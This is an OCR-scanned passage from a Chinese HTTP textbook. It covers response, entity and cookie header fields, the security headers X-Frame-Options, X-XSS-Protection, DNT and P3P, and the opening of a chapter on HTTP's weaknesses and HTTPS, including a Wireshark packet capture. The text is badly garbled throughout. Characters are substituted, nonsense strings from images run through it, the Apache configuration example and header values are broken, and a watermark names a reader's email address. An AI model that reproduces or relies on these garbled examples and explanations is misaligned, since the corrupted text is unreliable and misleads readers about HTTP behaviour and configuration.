它 与 客户 端 和 服务 需 之 间 的 HTTP 访问 认证 的 行为 相似 ， 不 同 之 处 
在 于 其 认证 行为 是 在 客户 端 与 代理 之 间 进 行 的 。 而 客户 端 与 服务 闫 之 间 
进行 认证 时 ， 首 部 字段 WWW-Authorization 有 着 相同 的 作用 。 有 关 
HTTP 访问 认证 ， 后 面 的 章节 会 再 进行 详尽 曾 述 。 











6.5.6 Retry-After 





vr 


分 钟 后 再 来 访问 哦 明天 10 点 再 来 访问 号 





民 @ 忆 IE37 一 全 从 世贸 反 8 工 20 
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首部 字段 Retry-After 告知 客户 端 应 该 在 多 久之 后 再 次 发 送 请 求 。 主 
要 配合 状态 人 码 503 Service Unavailable 啊 应 ， 或 3xx Redirect 啊 应 一 起 
使 用 。 

字段 值 可 以 指定 为 具体 的 日 期 时 间 ( Wed, 04 Jul 2012 06: 34: 24 
GMT 等 格式 )， 也 可 以 是 创建 啊 应 后 的 秒 数 。 


6.5.7 Server 






我 是 Apache/2.2.17 ( Unix)> 


Server: Apache/2.2.17 (Unix) 


首部 字段 Server 告知 客户 端 当前 服务 胡 上 安 儿 的 HTTP 服务 从 应 用 
程序 的 信息 。 不 单单 会 标 出 服务 天 上 的 软件 应 用 名 称 ， 还 有 可 能 包括 版 
本 号 和 安装 时 局 用 的 可 选项 。 











Server: Apache/2.2.6 (Unix) PHP/5.2.5 
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6.5.8 Vary 
GET /sample.html GET /sample.html 
Neeeoe mamenaeer en us Ageelle daeaeler a us 





源 服务 器 











只 能 对 持 相 同 自然 语言 
( Accept-Language ) 的 请 求 返回 
绚 存 


图 : 当代 理 服务 器 接收 到 带 有 Vary 首部 字段 指定 获取 资源 的 请 求 时 ， 如 果 使 用 
的 Accept-Language 字段 的 值 相 同 ， 那 么 就 直接 从 缓存 返回 响应 。 反 之 ， 
则 需要 先 从 源 服务 器 端 获 取 资 源 后 才能 作为 响应 返回 


WE :Aeee le Mave ae 





首部 字段 Vary 可 对 缓存 进行 控制 。 源 服务 人 会 四 代理 服务 上 冀 传 达 
天 于 本 地 绥 存 使 用 方法 的 命令 。 

从 代理 服务 硕 接 收 到 源 服务 天 返回 包含 Vary 指定 项 的 啊 应 之 后 ， 
右 再 要 进行 缓存 ， 仅 对 请 求 中 含有 相同 Vary 指定 首部 字段 的 请 求 返回 
缓存 。 即 使 对 相同 资源 发 起 请 求 ， 但 由 于 Vary 指定 的 首部 字段 不 相同 ， 
此 必须 要 从 源 服务 囊 重 新 获取 资源 。 

















6.5.9 WWW-Authenticate 


WWW-Authenticate: Basic realm="Usagidesign Auth" 


Il23 
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上 


首部 字段 WWW-Authenticate 用 于 HTTP 访问 认证 。 它 会 告知 客户 
端 适用 于 访问 请 求 URI 所 指定 资源 的 认证 方案 ( Basic 或 是 Digest ) 和 
市 参数 提示 的 质询 (challenge )。 状 态 码 401 Unauthorized 啊 应 中 ， 肯 和 定 
市 有 首部 字段 WWW-Authenticate。 

上 述 示例 中 ，realm 字段 的 字符 串 是 为 了 辨别 请 求 URI 指定 资源 所 
受到 的 保护 策略 。 有 关 该 首部 ， 请 参阅 本 草 之 后 的 内 容 。 














6.6 ”实体 首部 字段 


实体 首部 字段 是 包含 在 请 求 报 文 和 啊 应 报 文中 的 实体 部 分 所 使 用 的 
首部 ， 用 于 补充 内 容 的 更 新 时 间 等 与 实体 相关 的 信息 。 

















图 : 在 请 求 和 响应 两 方 的 HTTP 报 文中 都 含有 与 实体 相关 的 首部 字段 


6.6.1 Allow 


在 我 这 边 只 能 使 用 GET 
禾 0 NEAD 方 法 虽 





A ON CI SAD 





客户 站 


Allow: GET, HEAD 
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首部 字段 Allow 用 于 通知 客户 端 能 够 文 持 Request-URI 指定 资源 的 
所 有 HTTP 方法 。 当 服务 硕 接 收 到 不 文 持 的 HITP 方法 时 ， 会 以 状态 人 码 
405 Method Not Allowed 作为 啊 应 返回 。 与 此 同时 ， 还 会 把 所 有 能 文 持 
的 HTTP 方法 写 入 首部 字段 Allow 后 返回 。 





6.6.2 Content-Encoding 


Gomseene Eeoome .za 


首部 字段 Content-Encoding 会 告知 客户 端 服务 器 对 实体 的 主体 部 分 
选用 的 内 容 编码 方式 。 内 容 编码 是 指 在 不 丢失 实体 信息 的 前 提 下 所 进行 
的 压缩 。 











127 


我 已 搜 这 种 方式 进行 了 压缩 ， 
之 后 网 解压 工作 就 拜托 你 了 





服务 右 


主要 采用 以 下 4 种 内 容 编 码 的 方式 。( 各 方式 的 说 明 请 参考 6.4.3 节 
Accept-Encoding 首部 字段 )。 





® gzip 
® compress 
® deflate 


® identity 
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6.6.3 Content-Language 





Gomaeens Tameuage zn en 


首部 字段 Content-Language 会 告知 客户 端 ， 实 体 主 体 使 用 的 自然 语 
言 〈 指 中 文 或 英文 等 语言 )。 
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6.6.4 Content-Length 






该 资 芳 的 大 小 为 /5000 字 节 





Content-Length: 15000 





首部 字段 Content-Length 表明 了 实体 主体 部 分 的 大 小 (单位 是 字 
节 )。 对 实体 主体 进行 内 容 编码 传输 时 ， 不 能 再 使 用 Content-Length 首 
部 字段 。 由 于 实体 主体 大 小 的 计算 方法 略微 复杂 ， 所 以 在 此 不 再 展开 。 
谈 者 在 想 一 探究 竟 ， 可 参考 RFC2616 的 4.4。 
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6.6.5 Content-Location 


Content-Location: http://www.hackr.jp/index-ja.html 


首部 字段 Content-Location 给 出 与 报 文 主体 部 分 相对 应 的 URI。 和 
首部 字段 Location 不 同 ，Content-Location 表示 的 是 报 文 主体 返回 资源 
对 应 的 URI。 

比如 ， 对 于 使 用 首部 字段 Accept-Language 的 服务 佑 驱动 型 请 求 ， 
当 返 回 的 页 面 内 容 与 实际 请 求 的 对 象 不 同时 ， 首 部 字段 Content- 
Location 内 会 写 明 URI。( 访 问 http:/www.hackrjp/ 返回 的 对 象 却 是 
http:/www.hackrjp/index-ja.html 等 类 似 情 况 ) 











6.6.6 Content-MD5 
129 
报 文 主体 
MD5 算 法 


Base64 编码 


Content -MD5 : 
OGFkKZDUwWNGVINNGY3N2MxMD 
IWZMQO4NTBMY2IyTY== 





客户 站 


图 : 客户 端 会 对 接收 的 报 文 主体 执行 相同 的 MD5 算法 ， 然 后 与 首部 字段 
Content-MD5 的 字段 值 比 较 


Content-MD5: OGEKZDUwWNGVhNGY3N2MXMDIwZmQ4NTBmY2IYTY== 
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er 


首部 字段 Content-MD5 是 一 串 由 MD5 算法 生成 的 值 ， 其 目的 在 于 
检查 报 文 主体 在 传输 过 程 中 是 否 保持 完整 ， 以 及 确认 传输 到 达 。 

对 报 文 主体 执行 MD5 算法 获得 的 128 位 二 进 制 数 ， 上 再 通过 Base64 
编码 后 将 结果 写 入 Content-MD5 字段 值 。 由 于 HITP 首部 无 法 记录 二 进 
制 值 ， 所 以 要 通过 Base64 编码 处 理 。 为 确保 报 文 的 有 效 性 ， 作 为 接收 
方 的 客户 端 会 对 报 文 主体 再 执行 一 次 相同 的 MD5 算法 。 计 算出 的 值 与 
字段 值 作 比 较 后 ， 即 可 判断 出 报 文 主体 的 准确 性 。 

采用 这 种 方法 ， 对 内 容 上 的 偶发 性 改变 是 无 从 查证 的 ， 也 无 法 检测 
出 恶意 赏 改 。 其 中 一 个 原因 在 于 ， 内 容 如 采 能 够 锌 赏 改 ， 那 么 同时 意味 
看 Content-MD5S 也 可 重新 计算 然后 被 和 代 改 。 所 以 处 在 接收 阶段 的 客户 站 
是 无 法 意识 到 报 文 主体 以 及 首部 字段 Content-MD5 是 已 经 被 算 改 过 的 。 





























6.6.7 ” Content-Range 





杷 那些 部 分 发 送 给 我 













++ 


全 部 10000 字 节 内 ， 先 
发 送 第 5oolv10000 字 节 
曲 资 源 吧 


E/T 206 BearlecEial Conctenec 

Date: Wed, 04 Jul 2012 07:28:03 GMT 
Content-Range: bytes 5001-10000/10000 
@omeene memeeneso000 

Content-Type: image/jpeg 
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Content-Range: bytes 5001-10000/10000 








为 单位 ， 表 示 当 前 发 送 部 分 及 整个 实体 大 小 。 


6.6.8 Content-Type 


Content-Type: text/html; charset=UTF-8 


首部 字段 Content-Type 说 明了 实体 主体 内 对 象 的 媒体 类 型 。 和 首部 
字段 Accept 一 样 ， 字 段 值 用 type/subtype 形式 赋值 。 
参数 charset 使 用 iso-8859-1 或 euc-jp 等 字符 集 进行 赋值 。 


Wd 


6.6.9 Expires 









该 资源 你 可 以 使 用 到 
20/2 年 7 月 4 日 





oanas SE Se A008 263050EeME 


首部 字段 Expires 会 将 资源 失效 的 日 期 告知 客户 端 。 绥 存 服务 带 在 
接收 到 含有 首部 字段 Expires 的 啊 应 后 ， 会 以 缓存 来 应 答 请 求 ， 在 
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EL 





Expires 字段 值 指 定 的 时 间 之 前 ， 啊 应 的 副本 会 一 直 被 保存 。 当 超过 
指定 的 时 间 后 ， 绥 存 服务 器 在 请 求 发 送 过 来 时 ， 会 转 同 源 服务 需 请 求 
资源 。 

源 服务 器 不 希望 缓存 服务 器 对 资源 缓存 时 ， 最 好 在 Expires 字段 内 
写 人 与 首部 字段 Date 相同 的 时 间 值 。 

但 是 ， 当 首部 字段 Cache-Control 有 指定 max-age 指令 时 ， 比 起 首 
部 字段 Expires， 会 优先 处 理 max-age 指令 。 








6.6.10 Last-Modified 






该 资 : 原 在 2012 年 5 月 23 日 被 修改 过 





客户 站 


Last-Modified: Wed, 23 May 2012 09:59:55 GMT 





首部 字段 Last-Modified 指明 资源 最 终 修 改 的 时 间 。 一 般 来 说 ， 这 
个 值 就 是 Request-URI 指定 资源 被 修改 的 时 间 。 但 类 似 使 用 CGI 脚本 进 
行动 态 数 据 处 理 时 ， 该 值 有 可 能 会 变 成 数据 最 终 修改 时 的 时 间 。 





6.7 为 Cookie 服务 的 首部 字段 


管理 服务 需 与 客户 端 之 间 状 态 的 Cookie， 虽 然 没 有 被 编 人 标准 化 
HTTP/1.1 的 RFC2616 中 ,但 在 Web 网 站 方面 得 到 了 广泛 的 应 用 。 

Cookie 的 工作 机 制 是 用 户 识 别 及 状态 管理 。Web 网 站 为 了 管理 用 户 
的 状态 会 通过 Web 浏览 硕 ， 把 一 些 数据 临时 写 和 人 用户 的 计算 机 内 。 接 
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大 当 用 户 访 问 该 Web 网 站 时 ， 可 通过 通信 方式 取 回 之 前 发 放 的 


Cookle。 


调用 Cookie 时 ， 由 于 可 校 验 Cookie 的 有 效 期 ， 以 及 发 送 方 的 域 、 


路 径 、 协 议 等 信息 ， 所 以 正规 发 布 的 Cookie 内 的 数据 不 会 因 来 日 其 他 
Web 站 点 和 攻击 者 的 攻击 而 泄露 。 


至 2013 年 5 月 ，Cookie 的 规格 标准 文档 有 以 下 4 种 。 


由 网 景 公司 颁布 的 规格 标准 

蚤 景 通信 公司 设计 并 开发 了 Cookie， 并 制定 相关 的 规格 标准 。1994 
年 前 后 ，Cookie 正式 应 用 在 网 景 浏 览 锅 中 。 目 前 最 为 普及 的 
Cookie 方式 也 是 以 此 为 基准 的 。 








RFC2109 

某 企 业 尝试 以 独立 技术 对 Cookie 规格 进行 标准 化 统筹 。 原 本 的 意 
图 是 想 和 网 景 公司 制 定 的 标准 交互 应 用 ， 可 惜 发 生 了 微妙 的 差异 。 
现在 该 标准 已 淡出 了 人 们 的 视线 。 








RFC2965 

为 终结 Internet Explorer 浏 蚁 冀 与 Netscape Navigator 的 标准 差异 而 
导致 的 浏览 器 战争 ，RFC2965 内 定义 了 新 的 HTTP 首部 Set- 
Cookie2 和 Cookie2。 可 事实 上 ， 它 们 几乎 没 怎么 投入 使 用 。 


RFC6265 
将 网 景 公 司 制定 的 标准 作为 业界 事实 标准 (De facto standard )， 重 
新 定义 Cookie 标准 后 的 产物 。 


目前 使 用 最 广泛 的 Cookie 标准 却 不 是 RFC 中 定义 的 任何 一 个 。 而 








是 在 网 景 公司 制定 的 标准 上 进行 扩展 后 的 产物 。 








本 证 接 下 来 就 对 目前 使 用 最 为 广泛 普及 的 标准 进行 说 明 。 
下 面 的 表格 内 列举 了 与 Cookie 有 关 的 首部 字段 。 
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表 6-8: 为 Cookie 服务 的 首部 字段 
首部 字段 名 说 明 首部 类 型 
Set-Cookie 开始 状态 管理 所 使 用 的 Cookie 信息 响应 首部 字段 











Cookie 服务 器 接收 到 的 Cookie 信息 请 求 首部 字段 


Set-Cookie 首部 






尔 拿 着 这 个 Cookie 





我 拿 好 这 个 
Cookie 3 





134 Cookie 首部 
6.7.1 Set-Cookie 


Set-Cookie: status=enable; expires=Tue, 05 Jul 2011 07:26:31 GMT; 之 
Paeh=/ donain= ae pp, 


当 服 务 硕 准备 开始 管理 客户 端的 状态 时 ， 会 事先 告知 各 种 信息 。 
下 面 的 表格 列举 了 Set-Cookie 的 字段 值 。 
表 6-9: Set-Cookie 字段 的 属性 
属性 
NAME=VALUE 赋予 Cookie 的 名 称 和 其 值 ( 必需 项 ) 
expires=DATE Cookie 的 有 效 期 ( 若 不 明确 指定 则 默认 为 浏览 器 关闭 前 为 止 ) 





path=PATH 将 服务 器 上 的 文件 目录 作为 Cookie 的 适用 对 象 ( 若 不 指定 则 
默认 为 文档 所 在 的 文件 目录 ) 


domain= 域名 作为 Cookie 适用 对 象 的 域名 ( 若 不 指定 则 默认 为 创建 Cookie 
的 服务 器 的 域名 ) 
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属性 





Secure 仅 在 HTTPS 安全 通信 时 才 会 发 送 Cookie 
HttpOnly 加 以 限制 ， 使 Cookie 不 能 被 JavaScript 脚 本 访问 
expires 属性 


Cookie 的 expires 属性 指定 浏览 套 可 发 送 Cookie 的 有 效 期 。 
当 省 略 expires 属性 时 ， 其 有 效 期 仪 限 于 维持 浏览 兹 会 话 ( Session ) 








时 间 段 内 。 这 通 营 限于 浏览 带 应 用 程序 被 关闭 之 前 。 

为 外 ， 一旦 Cookie 从 服务 此 端 发 送 至 客户 端 ， 服 务 胡 问 就 不 存在 
可 以 显 式 删除 Cookie 的 方法 。 但 可 通过 和 窗 盖 已 过 期 的 Cookie， 实 现 对 
客户 端 Cookie 的 实质 性 删除 操作 。 








path 属性 

Cookie 的 path 属性 可 用 于 限制 指定 Cookie 的 发 送 范 围 的 文件 目 
录 。 不 过 另 有 办 法 可 避 开 这 项 限制 ， 看 来 对 其 作为 安全 机 制 的 效果 不 能 
抱 有 期 待 。 





domain 属性 

通过 Cookie 的 domain 属性 指定 的 域名 可 做 到 与 结尾 匹配 一 致 。 比 
如 ， 当 指定 example.com 后 ， 除 example.com 以 外 ，www.example.com 
或 www2.example.com 等 都 可 以 发 送 Cookie。 

因此 ， 除 了 针对 具体 指定 的 多 个 域名 发 送 Cookie 之 外 ,不 指定 
domain 属性 显得 更 安全 。 


secure 属性 

Cookie 的 secure 属性 用 于 限制 Web 页 面 仪 在 HITPS 安全 连接 时 ， 
才 可 以 发 送 Cookie。 

发 送 Cookie 时 ， 指 定 secure 属性 的 方法 如 下 所 示 。 
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上 


Set-Cookie: name=value; secure 


以 上 例子 仪 当 在 https : /www.example.com/( HTTPS ) 安全 连接 的 
情况 下 才 会 进行 Cookie 的 回收 。 也 就 是 说 ， 即 使 域名 相同 ，http://www. 
example.com/( HTTP ) 也 不 会 发 生 Cookie 回收 行为 。 

当 省 略 secure 属性 时 ， 不 论 HTTP 还 是 HTTPS， 都 会 对 Cookie 进 
行 回 收 。 


HttpOnly 属性 

Cookie 的 HttpOnly 属性 是 Cookie 的 扩展 功能 ， 它 使 JavaScript 脚 
本 无 法 获得 Cookie。 其 主要 目的 为 防止 跨 站 脚本 攻击 (Cross-site 
scripting，XSS ) 对 Cookie 的 信息 急 取 。 

发 送 指定 HttpOnly 属性 的 Cookie 的 方法 如 下 所 示 。 


Set-Cookie: name=value; HttpOnly 





通过 上 述 设置 ,通常 从 Web 页 面 内 还 可 以 对 Cookie 进行 读 取 操作 。 
但 使 用 JavaScript 的 document.cookie 就 无 法 读 取 附加 HttpOnly 属性 后 
的 Cookie 的 内 容 了 。 因 此 ， 也 就 无 法 在 XSS 中 利用 JavaScript 劫持 
Cookie 了 。 

虽然 是 独立 的 扩展 功能 ， 但 Internet Explorer 6 SP1 以 上 版 本 等 当下 
的 主流 浏览 融 都 已 经 文 持 该 扩展 了 。 必 外 顺 市 一 提 ， 该 扩展 并 非 是 为 了 
防止 XSS 而 开发 的 。 





6.7.2 Cookie 


Cookie: status=enable 
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首部 字段 Cookie 会 告知 服务 需 ， 当 客户 端 想 获得 HTTP 状态 管理 
文 持 时 ， 就 会 在 请 求 中 包含 从 服务 需 接 收 到 的 Cookie。 接 收 到 多 个 
Cookie 时 ， 同 样 可 以 以 多 个 Cookie 形式 发 送 。 





6.8 ”其 他 首部 字段 

HTTP 首部 字段 是 可 以 自行 扩展 的 。 所 以 在 Web 服务 器 和 浏览 需 的 
应 用 上 ， 会 出 现 各 种 非 标准 的 首部 字段 。 

接 下 来 ， 我 们 就 一 些 最 为 常用 的 首部 字段 进行 说 明 。 








® X-Frame-Options 
@ X-XSS-Protection 
@DNT 


e P3P 
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6.8.1 X-Frame-Options 


X-Frame-Options: DENY 


首部 字段 X-Frame-Options 属于 HTTP 啊 应 首部 ， 用 于 控制 网 站 内 
容 在 其 他 Web 网 站 的 Frame 标签 内 的 显示 问题 。 其 主要 目的 是 为 了 防 
止 点 击 劫持 (clickjacking ) 攻击 。 

首部 字段 X-Frame-Options 有 以 下 两 个 可 指定 的 字段 值 。 





e DENY : 拒绝 

e。 SAMEORIGIN : 仅 同 源 域名 下 的 页 面 (Top-level-browsing-context ) 
匹配 时 许可 。( 比如 ， 当 指定 http://hackr.jp/sample.html 页 面 为 
SAMEORIGIN 时 ， 那 么 hackrjp 上 所 有 页 面 的 frame 都 被 允许 可 
加 载 该 页 面 ， 而 example.com 等 其 他 域名 的 页 面 就 不 行 了 ) 
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上 





文 持 该 首部 字段 的 训 览 郁 有 : Internet Explorer 8、Firefox 3.6.9+、 
Chrome 4.1.249.1042+、Safari 4+ 和 Opera 10.50+ 等 。 现 在 主流 的 浏览 


伪 部 已 经 支持 。 
能 在 所 有 的 Web 服务 需 端 预先 设 定 好 X-Frame-Options 字段 值 是 最 
理想 的 状态 。 


对 apache2.conf 的 配置 实例 


vilMeel ul mee cls 
Header append xX ERAME OPTIONS®"SAMEORTCGINY 
</IfModule> 


6.8.2 X-XSS-Protection 


138 X-XSS-Protection: 1 


首部 字段 X-XSS-Protection 属于 HTTP 啊 应 首部 ， 它 是 针对 跨 站 脚 
本 攻击 ( XSS ) 的 一 种 对 策 ， 用 于 控制 浏览 规 XSS 防护 机 制 的 开关 。 
首部 字段 X-XSS-Protection 可 指定 的 字段 值 如 下 。 











。0 : 将 XSS 过 滤 设 置 成 无 效 状态 
。 1 : 将 XSS 过 滤 设 置 成 有 效 状态 
6.8.3 DNT 






我 不 会 把 我 曲 信 
自 交 给 保 曲 ! 





DNT 首 部 
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DN 


首部 字段 DNT 属于 HTTP 请 求 首 部 ， 其 中 DNT 是 Do Not Track 
的 人 简称， 半 为 拒绝 个 人 信息 被 收集 ， 是 表示 拒绝 被 精准 广告 追踪 的 一 
种 方法 。 








首部 字段 DNT 可 指定 的 字段 值 如 下 。 


。0 : 同意 被 奶 踪 
1 : 拒绝 被 奶 踊 








由 于 首部 字段 DNT 的 功能 具备 有 效 性 ， 所 以 Web 服务 需 需 要 对 
DNT 做 对 应 的 支持 。 





6.8.4 P3P 


P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa SO 
VA DN OURS EOS ND UN OMEEANYE NN 


首部 字段 P3P 属于 HTTP 相应 首部 ， 通 过 利用 P3P (The Platform 
for Privacy Preferences， 在 线 隐 私 俩 好 平台 ) 技术 ， 可 以 让 Web 网 站 上 
的 个 人 隐私 变 成 一 种 仅 供 程 序 可 理解 的 形式 ， 以 达到 保护 用 户 隐 私 的 
目的 。 





烟 


P3P 的 设 定 ， 需 按 以 下 操作 步骤 进行 。 


创建 P3P 隐私 
创建 P3P 隐私 对 照 文 件 后 ， 保 存 命名 在 /w3c/p3p.xml 
从 P3P 隐私 中 新 建 Compact policies 后 ， 输 出 到 HTTP 啊 
应 中 





汕 讽 涉 
QO DD 一 
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有 关 P3P 的 详细 规范 标准 请 参看 下 方 链接 。 
e The Platform for Privacy Preferences 1.0 ( P3P1.0 ) Specification 
http://www.w3.org/TR/P3P/ 
加 图 | 
国 国 加 


协议 中 对 X- 前 级 的 废除 

在 HTTP 等 多 种 协议 中 ， 通 过 给 非 标准 参数 加 上 前 缀 X-， 来 区 别 于 标 
准 参 数 ， 并 使 那些 非 标准 的 参数 作为 扩展 变 成 可 能 。 但 是 这 种 简单 粗暴 的 
做 夫人 有 有 百 宇 WW 克 7 7 RECG6648 Deprecatng rile xX Prefix 
and Similar Constructs in Application Protocols” 中 提议 停止 该 做 法 。 

然而 ， 对 已 经 在 使 用 中 的 X- 前 缀 来 说 ， 不 应 该 要 求 其 变更 。 

国 国 图 
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第 7 章 
确保 Web 安全 的 HTTPS 
在 HTTP 协 议 中 有 可 能 存在 信息 窃听 或 身份 伪装 等 安全 问题 。 使 


用 HTTPS 通信 机 制 可 以 有 效 地 防止 这 些 问 题 。 本 章 我 们 就 了 解 一 
下 HTTPS 。 
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ER 


7.1 HTTP 的 缺点 


到 现在 为 止 ， 我 们 已 了 解 到 HTTP 具有 相当 优秀 和 方便 的 一 面 ， 然 
而 HTTP 并 非 只 有 好 的 一 面 ， 事 物 丝 具 两 面 性 ， 它 也 是 有 不 足 之 处 的 。 
HTTP 主要 有 这 些 不 足 ， 例 举 如 下 。 








e@ 通信 使 用 明文 (不 加 密 )， 内 容 可 能 会 被 窃听 
e 个 验证 通信 方 的 身份 ， 因 此 有 可 能 遭遇 伪 疾 
e 无 法 证 明报 文 的 完整 性 ， 所 以 有 可 能 已 遭 修改 


这 些 问 题 不 仅 在 HITP 上 出 现 ， 其 他 未 加 密 的 协议 中 也 会 存在 这 类 
问题 。 

除 此 之 外 ，HTTP 本 身 还 有 很 多 缺点 。 而 且 ， 还 有 像 某 些 特定 的 
Web 服务 融和 特定 的 Web 浏览 希 在 实际 应 用 中 存在 的 不 足 ( 也 可 以 说 
成 是 脆弱 性 或 安全 漏洞 )， 男 外 ， 用 Java 和 PHP 等 编程 语言 开发 的 Web 
应 用 也 可 能 存在 安全 漏洞 。 


7.1.1 通信 使 用 明文 可 能 会 被 窃听 

由 于 HTTP 本 身 不 具备 加 密 的 功能 ， 所 以 也 无 法 做 到 对 通信 整体 
(使 用 HTTP 协议 通信 的 请 求 和 响应 的 内 容 ) 进行 加 密 。 即 ，HTTP 报 
文 使 用 明文 〈 指 未 经 过 加 密 的 报 文 ) 方式 发 送 。 














图 TCP/IP 是 可 能 被 窍 听 的 网 络 
如 末 要 问 为 什么 通信 时 不 加 密 是 一 个 缺 扣 ， 这 是 因为 ， 按 TCP/IP 
协议 族 的 工作 机 制 ， 通 信和 内容 在 所 有 的 通信 线路 上 都 有 可 能 遭 到 舌 视 。 
所 请 互联 网 ， 是 由 能 连通 到 全 志 界 的 网 络 组 成 的 。 无 论 世 界 哪个 角 
洛 的 服务 天 在 和 客户 端 通信 时 ， 在 此 通信 线路 上 的 采 些 网 络 设备 、 光 
纹 、 计 算 机 等 客 不 可 能 是 个 人 的 私有 物 ， 所 以 不 排除 茶 个 环节 中 会 遭 到 
恶意 蜂 视 行为 。 











图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 7 章 确保 Web 安 全 的 HTTPS 


即使 已 经 过 加 密 处 理 的 通信 ， 也 会 被 笑 视 到 通信 和 内容， 这 点 和 未 加 
蜜 的 通信 和 是 相 同 的 。 只 是 说 如 打通 信 经 过 加 密 ， 就 有 可 能 让 人 无 法 破解 
报 文 信息 的 含义 ， 但 加 密 处 理 后 的 报 文 信息 本 吴 还 是 会 被 看 到 的 。 








| 
相同 [AN 内 的 量 所 | 


其 他 客户 端 


: 互联 网 上 的 任何 角落 都 存在 通信 和 内容 被 窃听 的 风险 
143 





委 听 相同 段 上 的 通信 并 非 难 事 。 只 需要 收集 在 互联 网 上 流动 的 数据 
包 〈 帧 ) 就 行 了 。 对 于 收集 来 的 数据 包 的 解析 工作 ， 可 区 给 那些 抓 包 
( Packet Capture ) 或 别 探 大 ( Sniffer ) 工具 。 

下 面 的 图 片 示例 就 是 被 广泛 使 用 的 抓 包工 具 Wireshark。 它 可 以 获 
取 HTTP 协议 的 请 求 和 啊 应 的 内 容 ， 并 对 其 进行 解析 。 

像 使 用 GET 方法 发 送 请 求 、 响 应 返回 了 200 OK， 查 看 HTTP 响应 
报 文 的 全 部 内 容 等 一 系列 的 事情 都 可 以 做 到 。 
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[ 国 Aheros AR813X/AR815x PELE Ethemet Controller Iwireshark 1.6.8 (SVN Rev 42761 from ftrunk 1.6) 

| File Edt View Go Capture Analyze Statistics Telephony Took Intemak Help 

| 节 宙 忆 创 定 | 马 回 关 多 是 1A 外 甸 守 主 | 国 国 QQQ 昌 | 钙 田 网 交 | 回 

| oe :tcp。 Bs 加 Clear 2 
Time Source inati Protocol Length Info 














18 2.566264 203.189.105.112 192.168.3.101 66 http > 58330 [SYN, ACK] Seq=0 Ack=1 Win=5840 Ler| 


29 2.573205 203.189.105.112 192.168.3.101 60 http > 58330 [ACK] Seq=1 Ack=345 Win=6912 Len=0 
30 2.584874 203.189.105.112 192.168.3.101 650 HTTP/1.1 200 OK (text/html) 
31 2.584929 203.189.105.112 192.168.3.101 60 http > 58330 [FIN, ACK] Seq=597 Ack=345 Win=6913 


34 2.591349 203.189.105.112 192.168.3.101 
加 





ETTETRR A I ET IEERETIITTIT GT 


: :6a: 
田 Internet Protocol Version 4, Src: 203.189.105.112 (203.189.105.112), Dst: 192. 168.3.101 (192.168.3.101) 
田 Transmijssion Control PFOt6c013 src Port: http (80), Dst Port: 58330 (58330), Seq: 1, Ack: 345, Len: 596 
日 
田 
Date: Fri, 13 Jul 2012 02:45:26 GMT\r\n 
server: Apache\r\n 
Last-Modified: Fri, 31 Aug 2007 02:02:20 GMT\r\n 
ETag: "45bae1l-16a-46d776ac"\r\n 
Accept-Ranges: bytes\r\n 
田 Content-Length: 362\r\n 
Connection: close\r\n 
Content-Type: text/html\r\n 
\r\n 
Line-based text data: text/html 
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@ | Frame (frame), 650 bytes | Packets: 84 Displayed: 10 Marked: 0 opp 0 profile: Defaukt 





图 : Wireshark ( http:/www.wireshark.org/) 


国 加 密 人 处 理 防 止 被 穷 听 
在 目前 大 家 正在 人 研究 的 如 何 防止 锣 听 保护 信息 的 几 种 对 宁 中 ， 最 为 
普及 的 就 是 加 和 密 技 术 。 加 密 的 对 象 可 以 有 这 么 几 个 。 


通信 的 加 密 

一 种 方式 就 是 将 通信 加 密 。HTTP 协议 中 没有 加 密 机 制 ， 但 可 以 通 
过 和 SSL ( Secure Socket Layer， 安 全 套 接 层 ) 或 TLS ( Transport Layer 
Security， 安 全 层 传输 协议 ) 的 组 合 使 用 ， 加 密 HITP 的 通信 内 容 。 

用 SSL 建立 安全 通信 线路 之 后 ， 就 可 以 在 这 条 线路 上 进行 HITP 
通信 了 。 与 SSL 组 合 使 用 的 HTTP 被 称 为 HTTPS ( HTTP Secure， 超 文 
本 传输 安全 协议 ) 或 HITP over SSL。 
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服务 器 与 客户 端 之 间 建 立 起 安全 的 通信 线路 之 后 开始 通信 








还 有 一 种 将 参与 通信 的 内 容 本 身 加 密 的 方式 。 由 于 HITP 协议 中 没 
有 加 密 机 制 ， 那 么 就 对 HTTP 协议 传输 的 内 容 本 里 加 密 。 即 把 HTTP 报 
文 里 所 含 的 内 容 进行 加 密 人 处 理 。 145 
在 这 种 情况 下 ， 客 户 端 需要 对 HTTP 报 文 进行 加 密 处 理 后 再 发 送 















这 里 未 被 加 密 
处 理 








报 文 首部 











这 里 面 的 内 容 会 被 加 密 处 理 ( 通信 本 
身 是 不 加 密 的 ) 








诚然 ， 为 了 做 到 有 效 的 内 容 加 密 ， 前 提 是 要 求 客 户 站 和 服务 天 同时 
具备 加 密 和 人 解密 机 制 。 主 要 应 用 在 Web 服务 中 。 有 一 点 必须 引起 注意 ， 
由 于 该 方式 不 同 于 SSL 或 TLS 将 整个 通信 线路 加 密 人 处理， 所 以 内 容 仍 
有 被 算 改 的 风险 。 稍 后 我 们 会 加 以 说 明 。 
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7.1.2 不 验证 通信 方 的 身份 就 可 能 遭遇 伪装 

HTTP 协议 中 的 请 求 和 响应 不 会 对 通信 方 进 行 确 认 。 也 就 是 说 存在 
“服务 器 是 否 就 是 发 送 请 求 中 URI 真正 指定 的 主机 ， 返 回 的 响应 是 否 真 
的 返回 到 实际 提出 请 求 的 客户 端 ” 等 类 似 问 题 。 





国 任 何人 都 可 发 起 请 求 

在 HITP 协议 通信 时 ， 由 于 不 存在 确认 通信 方 的 处 理 步 又 ， 任 何人 
都 可 以 发 起 请 求 。 另 外 ， 服 务 器 只 要 接收 到 请 求 ， 不 管 对 方 是 谁 都 会 返 
回 一 个 响应 (但 也 仅 限 于 发 送 端 的 卫 地 址 和 端口 号 没有 被 Web 服务 器 
设 定 限制 访问 的 前 提 下 )。 











不 管 你 1 是; 谁 我 
者 会 接 各 页 
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服务 器 
对 请 求 来 者 不 拒 








HTTP 协议 的 实现 本 身 非 常人 简单 ， 不 论 是 谁 发 送 过 来 的 请 求 都 会 返 
回 啊 应 ， 因 此 不 确认 通信 方 ， 会 存在 以 下 各 种 隐患 。 





e 无 法 确定 请 求 发 送 至 目标 的 Web 服务 器 是 否 是 按 真实 意图 返回 
呵 应 的 那 台 服务 器 。 有 可 能 是 已 伪装 的 Web 服务 器 。 

e 无 法 确定 史 应 返回 到 的 客户 端 是 否 是 按 真实 意图 接收 响应 的 那个 
客户 端 。 有 可 能 是 已 伪装 的 客户 端 。 

